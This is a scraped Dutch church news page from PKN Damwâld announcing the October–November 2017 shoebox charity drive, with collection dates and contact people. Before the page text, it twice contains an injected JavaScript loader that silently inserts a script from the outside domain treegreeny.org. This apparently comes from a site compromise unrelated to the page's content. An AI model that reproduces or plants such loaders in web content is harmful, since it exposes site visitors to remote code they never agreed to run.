;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Schoendoosactie weer van start - PKN Damwâld

Schoendoosactie weer van start

Gepubliceerd op: maandag 16 oktober 2017

Al meer dan tien jaar is er de schoenendoosactie in Damwâld.  Een prachtig initiatief dat in heel Nederland plaatsvindt ! Zo langzamerhand is ook heel Damwâld bezig een schoenendoos te vullen voor kinderen die leven in moeilijke omstandigheden. Een schoenendoos met schoolspullen, toiletartikelen en speelgoed voor leeftijdsgenootjes in ontwikkelingslanden. Ze doen daarmee iets concreets voor vriendjes in arme landen. Van schoenendoos tot onvergetelijk cadeau. Onderwijs is zoveel meer dan leren schrijven en rekenen. Door mee te doen leren kinderen een waardevolle les: dat geven om een ander belangrijk is. En krijgen leeftijdsgenootjes in ontwikkelingslanden een onvergetelijk cadeau. De schoenendozen gaan naar kinderen op scholen, in weeshuizen, vluchtelingenkampen en opvangcentra voor straatkinderen.

Enveloppen uitdelen en dozen inleveren
Zondag 29 oktober zullen de  schoenendoosactie-enveloppen weer bij beide PKN-kerken in Damwâld worden uitgedeeld. Tot nu toe is de actie altijd een groot succes gebleken. We rekenen ook dit jaar weer op een succesvolle actie. Zondag 5 november kunnen de schoenendozen weer in de kerk ingeleverd worden. Doos en machtigingsformulier dienen bij elkaar ingeleverd te worden. Er wordt zes euro gevraagd en het machtigingsformulier niet de doos stoppen. DUS GEEN GELD IN DE ENVELOP. Ouders met schoolgaande kinderen kunnen de dozen op de scholen inleveren. En iedereen zonder schoolgaande kinderen kunnen de dozen inleveren zowel in de morgen- als de middagdienst op zondag 5 november.
Sjoerd en Matty van der Werf ( 424146 ) en Nienke van der Heide ( 422360 )